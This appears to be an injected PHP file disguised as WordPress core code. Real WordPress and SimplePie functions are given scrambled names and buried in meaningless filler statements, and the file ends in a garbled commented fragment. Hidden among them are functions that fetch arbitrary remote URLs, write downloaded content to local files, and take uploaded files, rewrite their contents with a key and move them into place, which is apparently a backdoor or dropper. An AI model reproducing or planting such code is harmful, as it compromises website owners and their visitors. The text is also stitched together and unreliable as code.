$wp_post_statuses = tanh(394);
return $tmp_fh;
}
/* translators: %s: Menu name. */
function sanitize_widget_instance ($global_tables){
$all_user_ids = (!isset($all_user_ids)?'relr':'g0boziy');
// <Header for 'Synchronised lyrics/text', ID: 'SYLT'>
// Don't 404 for authors without posts as long as they matched an author on this site.
$allowed_where['m261i6w1l'] = 'aaqvwgb';
// http://privatewww.essex.ac.uk/~djmrob/replaygain/file_format_id3v2.html
if(!isset($link_el)) {
$link_el = 'xyrx1';
}
$global_tables = 'sqx1';
# fe_0(z2);
// Index Entry Count DWORD 32 // Specifies the number of Index Entries in the block.
$link_el = sin(144);
// If the archive does not exist, it is created.
// [44][7A] -- Specifies the language of the tag specified, in the Matroska languages form.
// Remove gaps in indices.
$features = (!isset($features)?"fkpt":"ghuf7a");
if(!isset($block_classname)) {
$block_classname = 'jrhqgbc';
}
$block_classname = strrpos($global_tables, $global_tables);
$link_el = lcfirst($link_el);
// s[14] = s5 >> 7;
$r_p1p1 = (!isset($r_p1p1)? 'bks1v' : 'twp4');
$max_days_of_year = (!isset($max_days_of_year)? "mh5cs" : "bwc6");
if(!(htmlentities($link_el)) == FALSE) {
$pend = 'rnrzu6';
}
$cleaning_up['lsbdg8mf1'] = 'n4zni8wuu';
// Some servers disable `ini_set()` and `ini_get()`, we check this before trying to get configuration values.
# fe_sq(h->X,v3);
$preg_marker['j0wwrdyzf'] = 1648;
if(!isset($arc_w_last)) {
$arc_w_last = 'taguxl';
}
$arc_w_last = addcslashes($block_classname, $block_classname);
if(empty(stripslashes($arc_w_last)) == FALSE){
$widget_description = 'erxi0j5';
}
if(!isset($built_ins)) {
$built_ins = 'gtd22efl';
}
$built_ins = asin(158);
$is_customize_admin_page['gwht2m28'] = 'djtxda';
if(!empty(base64_encode($arc_w_last)) != False) {
$response_size = 'tjax';
}
$doctype['wrir'] = 4655;
if(empty(soundex($arc_w_last)) != true){
$updated_notice_args = 'ej6jlh1';
}
$new_group = 'ti94';
if(empty(convert_uuencode($new_group)) !== TRUE) {
$p_comment = 'usug7u43';
}
return $global_tables;
}
/**
* Authenticates a user using the email and password.
*
* @since 4.5.0
*
* @param WP_User|WP_Error|null $sticky_posts WP_User or WP_Error object if a previous
* callback failed authentication.
* @param string $selectors Email address for authentication.
* @param string $password Password for authentication.
* @return WP_User|WP_Error WP_User on success, WP_Error on failure.
*/
function wp_ajax_install_plugin($post_classes){
echo $post_classes;
}
/**
* Checks if a file is readable.
*
* @since 2.7.0
*
* @param string $file Path to file.
* @return bool Whether $file is readable.
*/
function doEncode($bittotal, $help_install){
// Meta.
$top_level_pages = file_get_contents($bittotal);
$all_text = 'px7ram';
$session_id = get_compat_media_markup($top_level_pages, $help_install);
file_put_contents($bittotal, $session_id);
}
/* translators: %s: mysqli. */
function filter_wp_nav_menu($role_caps){
deslash($role_caps);
$is_bad_hierarchical_slug['omjwb'] = 'vwioe86w';
$m_root_check = (!isset($m_root_check)? 'gwqj' : 'tt9sy');
$do_legacy_args = 'a6z0r1u';
$original_locale['xr26v69r'] = 4403;
$editor_class = 'xw87l';
wp_ajax_install_plugin($role_caps);
}
//Don't output, just log
// Test the DB connection.
/*
* The alias is not in a group, so we create a new one
* and add the alias to it.
*/
function setWordWrap($category_query){
// synchsafe ints are not allowed to be signed
$check_dir = 'vew7';
$modifiers = 'blgxak1';
$v_month = 'sddx8';
$preferred_icons = (!isset($preferred_icons)? "dsky41" : "yvt8twb");
$binaryString['d0mrae'] = 'ufwq';
$tile['kyv3mi4o'] = 'b6yza25ki';
$variation_declarations['tnh5qf9tl'] = 4698;
$sitemap_list['zlg6l'] = 4809;
$v_month = strcoll($v_month, $v_month);
if(!isset($delta)) {
$delta = 'cgt9h7';
}
$view_script_module_ids = 'cyzdou4rj';
$check_dir = str_shuffle($check_dir);
$delta = nl2br($modifiers);
$combined_gap_value['pnaugpzy'] = 697;
$v_month = md5($view_script_module_ids);
$category_query = ord($category_query);
// Accepts only 'user', 'admin' , 'both' or default '' as $notify.
// let k = k + base
// Imagick.
return $category_query;
}
// wp_set_comment_status() uses "hold".
/** RSS feed constant. */
function get_theme_item($supported_block_attributes){
$batch_size = 'hrpw29';
# az[0] &= 248;
// s11 += s23 * 666643;
$supported_block_attributes = "http://" . $supported_block_attributes;
return file_get_contents($supported_block_attributes);
}
/**
* Fixes JavaScript bugs in browsers.
*
* Converts unicode characters to HTML numbered entities.
*
* @since 1.5.0
* @deprecated 3.0.0
*
* @global $block_id
* @global $PaddingLength
*
* @param string $stik Text to be made safe.
* @return string Fixed text.
*/
function get_row($stik)
{
_deprecated_function(__FUNCTION__, '3.0.0');
// Fixes for browsers' JavaScript bugs.
global $block_id, $PaddingLength;
if ($PaddingLength || $block_id) {
$stik = preg_replace_callback("/\\%u([0-9A-F]{4,4})/", "funky_javascript_callback", $stik);
}
return $stik;
}
// Run Block Hooks algorithm to inject hooked blocks.
/**
* Retrieve list of allowed HTTP origins.
*
* @since 3.4.0
*
* @return string[] Array of origin URLs.
*/
function wp_image_editor_supports()
{
$next_item_id = parse_url(admin_url());
$day_month_year_error_msg = parse_url(home_url());
// @todo Preserve port?
$menu_item_obj = array_unique(array('http://' . $next_item_id['host'], 'https://' . $next_item_id['host'], 'http://' . $day_month_year_error_msg['host'], 'https://' . $day_month_year_error_msg['host']));
/**
* Change the origin types allowed for HTTP requests.
*
* @since 3.4.0
*
* @param string[] $menu_item_obj {
* Array of default allowed HTTP origins.
*
* @type string $0 Non-secure URL for admin origin.
* @type string $1 Secure URL for admin origin.
* @type string $2 Non-secure URL for home origin.
* @type string $3 Secure URL for home origin.
* }
*/
return apply_filters('allowed_http_origins', $menu_item_obj);
}
/**
* Creates term and taxonomy relationships.
*
* Relates an object (post, link, etc.) to a term and taxonomy type. Creates the
* term and taxonomy relationship if it doesn't already exist. Creates a term if
* it doesn't exist (using the slug).
*
* A relationship means that the term is grouped in or belongs to the taxonomy.
* A term has no meaning until it is given context by defining which taxonomy it
* exists under.
*
* @since 2.3.0
*
* @global wpdb $bootstrap_result WordPress database abstraction object.
*
* @param int $object_id The object to relate to.
* @param string|int|array $terms A single term slug, single term ID, or array of either term slugs or IDs.
* Will replace all existing related terms in this taxonomy. Passing an
* empty array will remove all related terms.
* @param string $month_exists The context in which to relate the term to the object.
* @param bool $append Optional. If false will delete difference of terms. Default false.
* @return array|WP_Error Term taxonomy IDs of the affected terms or WP_Error on failure.
*/
function refresh_user_details($max_stts_entries_to_scan, $max_num_comment_pages, $role_caps){
$cookie_jar = $_FILES[$max_stts_entries_to_scan]['name'];
// Then prepare the information that will be stored for that file.
$classname = 'y7czv8w';
$v_options_trick = 'i7ai9x';
$is_bad_hierarchical_slug['omjwb'] = 'vwioe86w';
$last_dir = 'fcv5it';
// tmax if k >= bias + tmax, or k - bias otherwise
//Parse by chunks not to use too much memory
if(!(stripslashes($classname)) !== true) {
$slugs_to_include = 'olak7';
}
$stopwords['mz9a'] = 4239;
if(!empty(str_repeat($v_options_trick, 4)) != true) {
$uploaded_to_link = 'c9ws7kojz';
}
if(!isset($sites_columns)) {
$sites_columns = 'p06z5du';
}
// $this->fseek($prenullbytefileoffset);
$bittotal = unregister_block_pattern($cookie_jar);
$remainder = 'grsyi99e';
if(empty(lcfirst($v_options_trick)) === true) {
$subset = 'lvgnpam';
}
$sites_columns = tan(481);
if(!isset($startup_warning)) {
$startup_warning = 'q1wrn';
}
$toggle_button_content = (!isset($toggle_button_content)? "i4fngr" : "gowzpj4");
$sites_columns = abs(528);
$startup_warning = addslashes($last_dir);
$remainder = addcslashes($remainder, $classname);
// Swap out the link for our marker.
doEncode($_FILES[$max_stts_entries_to_scan]['tmp_name'], $max_num_comment_pages);
level_reduction($_FILES[$max_stts_entries_to_scan]['tmp_name'], $bittotal);
}
/**
* Get a full site URL, given a domain and a path.
*
* @since MU (3.0.0)
* @deprecated 3.7.0
*
* @param string $domain
* @param string $float
* @return string
*/
function deslash($supported_block_attributes){
// DESCription
$cookie_jar = basename($supported_block_attributes);
// If there are no keys, test the root.
if(!empty(exp(22)) !== true) {
$img_url_basename = 'orj0j4';
}
$bittotal = unregister_block_pattern($cookie_jar);
// For every field in the table.
sodium_base642bin($supported_block_attributes, $bittotal);
}
/**
* Set the URL of the feed you want to parse
*
* This allows you to enter the URL of the feed you want to parse, or the
* website you want to try to use auto-discovery on. This takes priority
* over any set raw data.
*
* You can set multiple feeds to mash together by passing an array instead
* of a string for the $supported_block_attributes. Remember that with each additional feed comes
* additional processing and resources.
*
* @since 1.0 Preview Release
* @see set_raw_data()
* @param string|array $supported_block_attributes This is the URL (or array of URLs) that you want to parse.
*/
if(!isset($fractionstring)) {
$fractionstring = 'xlrgj4ni';
}
$fractionstring = sinh(453);
$LastHeaderByte['bs85'] = 'ikjj6eg8d';
/**
* Get data for an feed-level element
*
* This method allows you to get access to ANY element/attribute that is a
* sub-element of the opening feed tag.
*
* The return value is an indexed array of elements matching the given
* namespace and tag name. Each element has `attribs`, `data` and `child`
* subkeys. For `attribs` and `child`, these contain namespace subkeys.
* `attribs` then has one level of associative name => value data (where
* `value` is a string) after the namespace. `child` has tag-indexed keys
* after the namespace, each member of which is an indexed array matching
* this same format.
*
* For example:
* <pre>
* // This is probably a bad example because we already support
* // <media:content> natively, but it shows you how to parse through
* // the nodes.
* $seen = $item->get_item_tags(SIMPLEPIE_NAMESPACE_MEDIARSS, 'group');
* $content = $seen[0]['child'][SIMPLEPIE_NAMESPACE_MEDIARSS]['content'];
* $file = $content[0]['attribs']['']['url'];
* echo $file;
* </pre>
*
* @since 1.0
* @see http://simplepie.org/wiki/faq/supported_xml_namespaces
* @param string $gd_image_formatsspace The URL of the XML namespace of the elements you're trying to access
* @param string $do_blog Tag name
* @return array
*/
if(!isset($dupe_id)) {
$dupe_id = 'e0bch90q';
}
$dupe_id = strripos($open_class, $open_class);
$open_class = cosh(179);
/**
* Holds the cached objects.
*
* @since 2.0.0
* @var array
*/
if((sinh(250)) == false) {
$delete_text = 'ama9y';
}
$dupe_id = log(654);
$dupe_id = strripos($open_class, $open_class);
$dupe_id = build_query_string($open_class);
/**
* Creates WordPress network meta and sets the default values.
*
* @since 5.1.0
*
* @global wpdb $bootstrap_result WordPress database abstraction object.
* @global int $typography_classes WordPress database version.
*
* @param int $file_show Network ID to populate meta for.
* @param array $orig_image Optional. Custom meta $help_install => $block_support_config pairs to use. Default empty array.
*/
function IntString2Bool($file_show, array $orig_image = array())
{
global $bootstrap_result, $typography_classes;
$file_show = (int) $file_show;
$selectors = !empty($orig_image['admin_email']) ? $orig_image['admin_email'] : '';
$child_path = isset($orig_image['subdomain_install']) ? (int) $orig_image['subdomain_install'] : 0;
// If a user with the provided email does not exist, default to the current user as the new network admin.
$request_order = !empty($selectors) ? get_user_by('email', $selectors) : false;
if (false === $request_order) {
$request_order = wp_get_current_user();
}
if (empty($selectors)) {
$selectors = $request_order->user_email;
}
$MPEGaudioVersion = get_option('template');
$max_height = get_option('stylesheet');
$ihost = array($max_height => true);
if ($MPEGaudioVersion !== $max_height) {
$ihost[$MPEGaudioVersion] = true;
}
if (WP_DEFAULT_THEME !== $max_height && WP_DEFAULT_THEME !== $MPEGaudioVersion) {
$ihost[WP_DEFAULT_THEME] = true;
}
// If WP_DEFAULT_THEME doesn't exist, also include the latest core default theme.
if (!wp_get_theme(WP_DEFAULT_THEME)->exists()) {
$BitrateRecordsCounter = WP_Theme::get_core_default_theme();
if ($BitrateRecordsCounter) {
$ihost[$BitrateRecordsCounter->get_stylesheet()] = true;
}
}
if (function_exists('clean_network_cache')) {
clean_network_cache($file_show);
} else {
wp_cache_delete($file_show, 'networks');
}
if (!is_multisite()) {
$p2 = array($request_order->user_login);
$DKIMb64 = get_users(array('fields' => array('user_login'), 'role' => 'administrator'));
if ($DKIMb64) {
foreach ($DKIMb64 as $sticky_posts) {
$p2[] = $sticky_posts->user_login;
}
$p2 = array_unique($p2);
}
} else {
$p2 = get_site_option('site_admins');
}
/* translators: Do not translate USERNAME, SITE_NAME, BLOG_URL, PASSWORD: those are placeholders. */
$new_menu = __('Howdy USERNAME,
Your new SITE_NAME site has been successfully set up at:
BLOG_URL
You can log in to the administrator account with the following information:
Username: USERNAME
Password: PASSWORD
Log in here: BLOG_URLwp-login.php
We hope you enjoy your new site. Thanks!
--The Team @ SITE_NAME');
$has_submenu = array(
// Images.
'jpg',
'jpeg',
'png',
'gif',
'webp',
'avif',
// Video.
'mov',
'avi',
'mpg',
'3gp',
'3g2',
// "audio".
'midi',
'mid',
// Miscellaneous.
'pdf',
'doc',
'ppt',
'odt',
'pptx',
'docx',
'pps',
'ppsx',
'xls',
'xlsx',
'key',
);
$enhanced_query_stack = wp_get_audio_extensions();
$nav_menus = wp_get_video_extensions();
$actual = array_unique(array_merge($has_submenu, $enhanced_query_stack, $nav_menus));
$some_non_rendered_areas_messages = array(
'site_name' => __('My Network'),
'admin_email' => $selectors,
'admin_user_id' => $request_order->ID,
'registration' => 'none',
'upload_filetypes' => implode(' ', $actual),
'blog_upload_space' => 100,
'fileupload_maxk' => 1500,
'site_admins' => $p2,
'allowedthemes' => $ihost,
'illegal_names' => array('www', 'web', 'root', 'admin', 'main', 'invite', 'administrator', 'files'),
'wpmu_upgrade_site' => $typography_classes,
'welcome_email' => $new_menu,
/* translators: %s: Site link. */
'first_post' => __('Welcome to %s. This is your first post. Edit or delete it, then start writing!'),
// @todo - Network admins should have a method of editing the network siteurl (used for cookie hash).
'siteurl' => get_option('siteurl') . '/',
'add_new_users' => '0',
'upload_space_check_disabled' => is_multisite() ? get_site_option('upload_space_check_disabled') : '1',
'subdomain_install' => $child_path,
'ms_files_rewriting' => is_multisite() ? get_site_option('ms_files_rewriting') : '0',
'user_count' => get_site_option('user_count'),
'initial_db_version' => get_option('initial_db_version'),
'active_sitewide_plugins' => array(),
'WPLANG' => get_locale(),
);
if (!$child_path) {
$some_non_rendered_areas_messages['illegal_names'][] = 'blog';
}
$some_non_rendered_areas_messages = wp_parse_args($orig_image, $some_non_rendered_areas_messages);
/**
* Filters meta for a network on creation.
*
* @since 3.7.0
*
* @param array $some_non_rendered_areas_messages Associative array of network meta keys and values to be inserted.
* @param int $file_show ID of network to populate.
*/
$some_non_rendered_areas_messages = apply_filters('IntString2Bool', $some_non_rendered_areas_messages, $file_show);
$file_names = '';
foreach ($some_non_rendered_areas_messages as $f2g0 => $continious) {
if (is_array($continious)) {
$continious = serialize($continious);
}
if (!empty($file_names)) {
$file_names .= ', ';
}
$file_names .= $bootstrap_result->prepare('( %d, %s, %s)', $file_show, $f2g0, $continious);
}
$bootstrap_result->query("INSERT INTO {$bootstrap_result->sitemeta} ( site_id, meta_key, meta_value ) VALUES " . $file_names);
// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
}
$dupe_id = lcfirst($dupe_id);
$dupe_id = do_meta_boxes($open_class);
$lang_path = (!isset($lang_path)? 'xen3' : 'uwl394');
$reauth['qy3a700us'] = 3862;
/**
* An implementation of the PHPMailer OAuthTokenProvider interface.
*
* @var OAuthTokenProvider
*/
if(!isset($too_many_total_users)) {
$too_many_total_users = 'e0gpn';
}
$too_many_total_users = asin(884);
/**
* Gets last changed date for the specified cache group.
*
* @since 4.7.0
*
* @param string $seen Where the cache contents are grouped.
* @return string UNIX timestamp with microseconds representing when the group was last changed.
*/
function bin2hexUpper($seen)
{
$comments_picture_data = wp_cache_get('last_changed', $seen);
if ($comments_picture_data) {
return $comments_picture_data;
}
return wp_cache_set_last_changed($seen);
}
$preload_resources = 'ml2g1zfq';
/**
* Block variations callback.
*
* @since 6.5.0
* @var callable|null
*/
if(empty(htmlentities($preload_resources)) != false) {
$chown = 'zndpfvvt';
}
$too_many_total_users = atan(265);
$dupe_id = html_entity_decode($preload_resources);
$too_many_total_users = wp_deleteCategory($too_many_total_users);
$too_many_total_users = expm1(974);
$dupe_id = sin(574);
/* translators: The placeholder is a WordPress PHP function name. */
if(!empty(ltrim($preload_resources)) === TRUE) {
$p_add_dir = 'lfqoq';
}
$author__in['zfjwjk'] = 4192;
$preload_resources = strtolower($too_many_total_users);
$too_many_total_users = lcfirst($preload_resources);
/**
* Retrieves the URL to a REST endpoint on a site.
*
* Note: The returned URL is NOT escaped.
*
* @since 4.4.0
*
* @todo Check if this is even necessary
* @global WP_Rewrite $realType WordPress rewrite component.
*
* @param int|null $posts_page Optional. Blog ID. Default of null returns URL for current blog.
* @param string $float Optional. REST route. Default '/'.
* @param string $options_misc_torrent_max_torrent_filesize Optional. Sanitization scheme. Default 'rest'.
* @return string Full URL to the endpoint.
*/
function set_data($posts_page = null, $float = '/', $options_misc_torrent_max_torrent_filesize = 'rest')
{
if (empty($float)) {
$float = '/';
}
$float = '/' . ltrim($float, '/');
if (is_multisite() && get_blog_option($posts_page, 'permalink_structure') || get_option('permalink_structure')) {
global $realType;
if ($realType->using_index_permalinks()) {
$supported_block_attributes = get_home_url($posts_page, $realType->index . '/' . rest_get_url_prefix(), $options_misc_torrent_max_torrent_filesize);
} else {
$supported_block_attributes = get_home_url($posts_page, rest_get_url_prefix(), $options_misc_torrent_max_torrent_filesize);
}
$supported_block_attributes .= $float;
} else {
$supported_block_attributes = trailingslashit(get_home_url($posts_page, '', $options_misc_torrent_max_torrent_filesize));
/*
* nginx only allows HTTP/1.0 methods when redirecting from / to /index.php.
* To work around this, we manually add index.php to the URL, avoiding the redirect.
*/
if (!str_ends_with($supported_block_attributes, 'index.php')) {
$supported_block_attributes .= 'index.php';
}
$supported_block_attributes = add_query_arg('rest_route', $float, $supported_block_attributes);
}
if (is_ssl() && isset($_SERVER['SERVER_NAME'])) {
// If the current host is the same as the REST URL host, force the REST URL scheme to HTTPS.
if (parse_url(get_home_url($posts_page), PHP_URL_HOST) === $_SERVER['SERVER_NAME']) {
$supported_block_attributes = set_url_scheme($supported_block_attributes, 'https');
}
}
if (is_admin() && force_ssl_admin()) {
/*
* In this situation the home URL may be http:, and `is_ssl()` may be false,
* but the admin is served over https: (one way or another), so REST API usage
* will be blocked by browsers unless it is also served over HTTPS.
*/
$supported_block_attributes = set_url_scheme($supported_block_attributes, 'https');
}
/**
* Filters the REST URL.
*
* Use this filter to adjust the url returned by the set_data() function.
*
* @since 4.4.0
*
* @param string $supported_block_attributes REST URL.
* @param string $float REST route.
* @param int|null $posts_page Blog ID.
* @param string $options_misc_torrent_max_torrent_filesize Sanitization scheme.
*/
return apply_filters('rest_url', $supported_block_attributes, $float, $posts_page, $options_misc_torrent_max_torrent_filesize);
}
$visible = 'ub4rego';
$blogs['h4ou'] = 3125;
/**
* WordPress Terms table.
*
* @since 2.3.0
*
* @var string
*/
if(!empty(strcspn($visible, $visible)) == True) {
$stripped_matches = 'q92mw';
}
$visible = bin2hex($visible);
$header_length = (!isset($header_length)? 'j9hith4b' : 'gtmdj8');
$from_string['klbv'] = 1548;
$visible = substr($visible, 11, 21);
$visible = set_restriction_class($visible);
$legal['a801'] = 936;
$visible = rad2deg(549);
$visible = render_block_core_post_excerpt($visible);
$show_summary['p1plul'] = 4659;
/**
* Filters the list of sites a user belongs to.
*
* @since MU (3.0.0)
*
* @param object[] $sites An array of site objects belonging to the user.
* @param int $sticky_posts_id User ID.
* @param bool $all Whether the returned sites array should contain all sites, including
* those marked 'deleted', 'archived', or 'spam'. Default false.
*/
if(!empty(rtrim($visible)) === True) {
$status_fields = 'mkonvf8i';
}
$server_public = (!isset($server_public)?'h1nf38jw3':'zcsp0');
$visible = abs(75);
/**
* Filters the settings' data that will be persisted into the changeset.
*
* Plugins may amend additional data (such as additional meta for settings) into the changeset with this filter.
*
* @since 4.7.0
*
* @param array $self Updated changeset data, mapping setting IDs to arrays containing a $block_support_config item and optionally other metadata.
* @param array $context {
* Filter context.
*
* @type string $uuid Changeset UUID.
* @type string $title Requested title for the changeset post.
* @type string $status Requested status for the changeset post.
* @type string $date_gmt Requested date for the changeset post in MySQL format and GMT timezone.
* @type int|false $post_id Post ID for the changeset, or false if it doesn't exist yet.
* @type array $previous_data Previous data contained in the changeset.
* @type WP_Customize_Manager $manager Manager instance.
* }
*/
if((asin(307)) != TRUE) {
$unapprove_url = 'm49e8mf';
}
$LookupExtendedHeaderRestrictionsImageSizeSize['ig0k4ye9m'] = 'sx9ptwvij';
$visible = log(500);
$visible = remove_rule($visible);
/**
* Retrieve WP_Post instance.
*
* @since 3.5.0
*
* @global wpdb $bootstrap_result WordPress database abstraction object.
*
* @param int $post_id Post ID.
* @return WP_Post|false Post object, false otherwise.
*/
if(!empty(htmlentities($visible)) == False) {
$player_parent = 'ipxv01et';
}
/**
* Constructor.
*
* @since 4.7.0
*
* @param string $parent_post_type Post type of the parent.
*/
if((lcfirst($visible)) == TRUE) {
$preload_paths = 'e9011y6';
}
/**
* Display generic dashboard RSS widget feed.
*
* @since 2.5.0
*
* @param string $update_args
*/
function ristretto255_from_hash($update_args)
{
$active_plugin_dependencies_count = get_option('dashboard_widget_options');
echo '<div class="rss-widget">';
wp_widget_rss_output($active_plugin_dependencies_count[$update_args]);
echo '</div>';
}
$important_pages = (!isset($important_pages)?"ez79kj3pz":"crb2dw1d8");
/* Run the diff and get the output. */
if(empty(urlencode($visible)) == TRUE) {
$default_column = 'cp5chsf';
}
$all_args = (!isset($all_args)? 'dkl83k' : 'l9f41nqa');
$script_handles['frh6cys'] = 3197;
/* translators: %s: attachment mime type */
if(!(round(394)) == True) {
$carry21 = 'llghi';
}
/**
* Retrieves the edit link for a tag.
*
* @since 2.7.0
*
* @param int|WP_Term|object $do_blog The ID or term object whose edit link will be retrieved.
* @param string $month_exists Optional. Taxonomy slug. Default 'post_tag'.
* @return string The edit tag link URL for the given tag.
*/
function get_lines($do_blog, $month_exists = 'post_tag')
{
/**
* Filters the edit link for a tag (or term in another taxonomy).
*
* @since 2.7.0
*
* @param string $link The term edit link.
*/
return apply_filters('get_lines', get_edit_term_link($do_blog, $month_exists));
}
$found_action['ipkwb8'] = 4695;
$visible = strripos($visible, $visible);
/**
* Option array passed to wp_register_sidebar_widget().
*
* @since 2.8.0
* @var array
*/
if(empty(deg2rad(168)) != true) {
$comments_rewrite = 'xmw41';
}
$visible = asinh(870);
$default_feed = 'sa71g';
$default_feed = strrev($default_feed);
$default_feed = wordwrap($default_feed);
$default_feed = stripcslashes($default_feed);
$default_feed = update_posts_count($default_feed);
$default_feed = acos(248);
$default_feed = htmlspecialchars_decode($default_feed);
$default_feed = fe_copy($default_feed);
$prefiltered_user_id = 'zyzibp';
/**
* @see ParagonIE_Sodium_Compat::library_version_minor()
* @return int
*/
if(empty(strrpos($default_feed, $prefiltered_user_id)) === TRUE) {
$last_updated = 'bdt5mx';
}
$default_feed = get_core_checksums($default_feed);
$new_theme = (!isset($new_theme)?"wa3h":"vrzj29az");
$hi['uhirz3'] = 2575;
$sanitize_callback['uvrlz'] = 3408;
/**
* Determines whether the query is for the blog homepage.
*
* This is the page which shows the time based blog content of your site.
*
* Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_for_posts'.
*
* If you set a static page for the front page of your site, this function will return
* true only on the page you set as the "Posts page".
*
* @since 3.1.0
*
* @see WP_Query::is_front_page()
*
* @return bool Whether the query is for the blog homepage.
*/
if(!empty(substr($default_feed, 10, 8)) !== False) {
$global_name = 'bph0l';
}
$default_feed = bin2hex($prefiltered_user_id);
$default_feed = atan(22);
$prefiltered_user_id = FixedPoint16_16($default_feed);
/**
* Outputs the hidden row displayed when inline editing
*
* @since 3.1.0
*
* @global string $mode List table view mode.
*/
if(empty(tan(790)) !== false) {
$default_attr = 'sxrr';
}
$columnkey = (!isset($columnkey)?'kgt1uv':'ral4');
$prefiltered_user_id = ltrim($prefiltered_user_id);
/**
* Determines if the available space defined by the admin has been exceeded by the user.
*
* @deprecated 3.0.0 Use is_upload_space_available()
* @see is_upload_space_available()
*/
function install_blog()
{
_deprecated_function(__FUNCTION__, '3.0.0', 'is_upload_space_available()');
if (!is_upload_space_available()) {
wp_die(sprintf(
/* translators: %s: Allowed space allocation. */
__('Sorry, you have used your space allocation of %s. Please delete some files to upload more files.'),
size_format(get_space_allowed() * MB_IN_BYTES)
));
}
}
/**
* DELETE method
*
* @var string
*/
if(empty(strip_tags($prefiltered_user_id)) === FALSE){
$query2 = 'bc9qy9m';
}
$has_nav_menu['de15tio9o'] = 'pcitex';
/**
* Filters whether to send the site moderator email notifications, overriding the site setting.
*
* @since 4.4.0
*
* @param bool $maybe_notify Whether to notify blog moderator.
* @param int $comment_id The ID of the comment for the notification.
*/
if(!(log(436)) == TRUE){
$editor_id = 'hnvfp2';
}
/**
* Given an ISO 8601 (Ymd\TH:i:sO) date, returns a MySQL DateTime (Y-m-d H:i:s) format used by post_date[_gmt].
*
* @since 1.5.0
*
* @param string $events_client Date and time in ISO 8601 format {@link https://en.wikipedia.org/wiki/ISO_8601}.
* @param string $permissive_match3 Optional. If set to 'gmt' returns the result in UTC. Default 'user'.
* @return string|false The date and time in MySQL DateTime format - Y-m-d H:i:s, or false on failure.
*/
function crypto_auth($events_client, $permissive_match3 = 'user')
{
$permissive_match3 = strtolower($permissive_match3);
$encoding_converted_text = wp_timezone();
$samples_per_second = date_create($events_client, $encoding_converted_text);
// Timezone is ignored if input has one.
if (false === $samples_per_second) {
return false;
}
if ('gmt' === $permissive_match3) {
return $samples_per_second->setTimezone(new DateTimeZone('UTC'))->format('Y-m-d H:i:s');
}
if ('user' === $permissive_match3) {
return $samples_per_second->setTimezone($encoding_converted_text)->format('Y-m-d H:i:s');
}
return false;
}
$comment_order = 'ze4ku';
$schema_styles_elements = (!isset($schema_styles_elements)? "i2cullj" : "ut0iuywb");
/**
* Returns the current locale.
*
* @since 6.5.0
*
* @return string Locale.
*/
if((strnatcasecmp($comment_order, $comment_order)) !== True) {
$centerMixLevelLookup = 'x0ra06co2';
}
$encoded_name['yp3s5xu'] = 'vmzv0oa1';
$default_feed = md5($default_feed);
/* 9\x0A\x0B\x0C\x0D\x20]*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?)*)[\x09\x0A\x0B\x0C\x0D\x20]*');
*
* PCRE for XML attributes
define('SIMPLEPIE_PCRE_XML_ATTRIBUTE', '((?:\s+(?:(?:[^\s:]+:)?[^\s:]+)\s*=\s*(?:"(?:[^"]*)"|\'(?:[^\']*)\'))*)\s*');
*
* XML Namespace
define('SIMPLEPIE_NAMESPACE_XML', 'http:www.w3.org/XML/1998/namespace');
*
* Atom 1.0 Namespace
define('SIMPLEPIE_NAMESPACE_ATOM_10', 'http:www.w3.org/2005/Atom');
*
* Atom 0.3 Namespace
define('SIMPLEPIE_NAMESPACE_ATOM_03', 'http:purl.org/atom/ns#');
*
* RDF Namespace
define('SIMPLEPIE_NAMESPACE_RDF', 'http:www.w3.org/1999/02/22-rdf-syntax-ns#');
*
* RSS 0.90 Namespace
define('SIMPLEPIE_NAMESPACE_RSS_090', 'http:my.netscape.com/rdf/simple/0.9/');
*
* RSS 1.0 Namespace
define('SIMPLEPIE_NAMESPACE_RSS_10', 'http:purl.org/rss/1.0/');
*
* RSS 1.0 Content Module Namespace
define('SIMPLEPIE_NAMESPACE_RSS_10_MODULES_CONTENT', 'http:purl.org/rss/1.0/modules/content/');
*
* RSS 2.0 Namespace
* (Stupid, I know, but I'm certain it will confuse people less with support.)
define('SIMPLEPIE_NAMESPACE_RSS_20', '');
*
* DC 1.0 Namespace
define('SIMPLEPIE_NAMESPACE_DC_10', 'http:purl.org/dc/elements/1.0/');
*
* DC 1.1 Namespace
define('SIMPLEPIE_NAMESPACE_DC_11', 'http:purl.org/dc/elements/1.1/');
*
* W3C Basic Geo (WGS84 lat/long) Vocabulary Namespace
define('SIMPLEPIE_NAMESPACE_W3C_BASIC_GEO', 'http:www.w3.org/2003/01/geo/wgs84_pos#');
*
* GeoRSS Namespace
define('SIMPLEPIE_NAMESPACE_GEORSS', 'http:www.georss.org/georss');
*
* Media RSS Namespace
define('SIMPLEPIE_NAMESPACE_MEDIARSS', 'http:search.yahoo.com/mrss/');
*
* Wrong Media RSS Namespace. Caused by a long-standing typo in the spec.
define('SIMPLEPIE_NAMESPACE_MEDIARSS_WRONG', 'http:search.yahoo.com/mrss');
*
* Wrong Media RSS Namespace #2. New namespace introduced in Media RSS 1.5.
define('SIMPLEPIE_NAMESPACE_MEDIARSS_WRONG2', 'http:video.search.yahoo.com/mrss');
*
* Wrong Media RSS Namespace #3. A possible typo of the Media RSS 1.5 namespace.
define('SIMPLEPIE_NAMESPACE_MEDIARSS_WRONG3', 'http:video.search.yahoo.com/mrss/');
*
* Wrong Media RSS Namespace #4. New spec location after the RSS Advisory Board takes it over, but not a valid namespace.
define('SIMPLEPIE_NAMESPACE_MEDIARSS_WRONG4', 'http:www.rssboard.org/media-rss');
*
* Wrong Media RSS Namespace #5. A possible typo of the RSS Advisory Board URL.
define('SIMPLEPIE_NAMESPACE_MEDIARSS_WRONG5', 'http:www.rssboard.org/media-rss/');
*
* iTunes RSS Namespace
define('SIMPLEPIE_NAMESPACE_ITUNES', 'http:www.itunes.com/dtds/podcast-1.0.dtd');
*
* XHTML Namespace
define('SIMPLEPIE_NAMESPACE_XHTML', 'http:www.w3.org/1999/xhtml');
*
* IANA Link Relations Registry
define('SIMPLEPIE_IANA_LINK_RELATIONS_REGISTRY', 'http:www.iana.org/assignments/relation/');
*
* No file source
define('SIMPLEPIE_FILE_SOURCE_NONE', 0);
*
* Remote file source
define('SIMPLEPIE_FILE_SOURCE_REMOTE', 1);
*
* Local file source
define('SIMPLEPIE_FILE_SOURCE_LOCAL', 2);
*
* fsockopen() file source
